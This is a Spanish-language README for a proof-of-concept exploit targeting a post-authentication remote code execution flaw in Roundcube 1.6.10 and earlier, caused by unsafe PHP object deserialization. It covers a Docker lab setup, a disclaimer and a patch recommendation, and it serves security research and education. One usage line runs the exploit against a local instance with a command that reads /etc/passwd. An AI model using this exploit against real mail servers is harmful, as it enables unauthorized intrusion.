
Exploit RCE post-autenticación para Roundcube ≤ 1.6.10 mediante deserialización de objetos PHP, con configuración de laboratorio basado en Docker y documentación técnica para investigación y educación en seguridad.
Se descubrió una vulnerabilidad crítica de ejecución remota de código (RCE) posterior a la autenticación en Roundcube (versiones ≤ 1.6.10), causada por una deserialización insegura de objetos PHP. Esta grave falla ha persistido silenciosamente en el código base durante más de 10 años.
Para el informe técnico completo y los detalles de explotación, visite:
👉 https://fearsoff.org/research/roundcube
Esto instalará Ubuntu 24.04, Roundcube y todas las dependencias necesarias dentro de un contenedor Docker:
docker run --name ubuntu24 \
-p 9876:80 \
-v "$PWD/rc_install.sh":/root/rc_install.sh \
-it ubuntu:24.04 \
bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"
⚠️ Nota: Utilícelo solo en entornos aislados. No exponga instancias vulnerables a Internet público.
Este código de prueba de concepto se proporciona únicamente con fines educativos y de investigación. El autor y los colaboradores no asumen ninguna responsabilidad por cualquier uso indebido o daño resultante del uso de este código. El uso no autorizado en sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas es ilegal y está estrictamente prohibido.
Asegúrese de tener php instalado en el sistema
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"
Si está ejecutando Roundcube ≤ 1.6.10, actualice inmediatamente a la última versión parcheada para eliminar esta vulnerabilidad.
Este proyecto y la documentación asociada se proporcionan bajo la licencia MIT.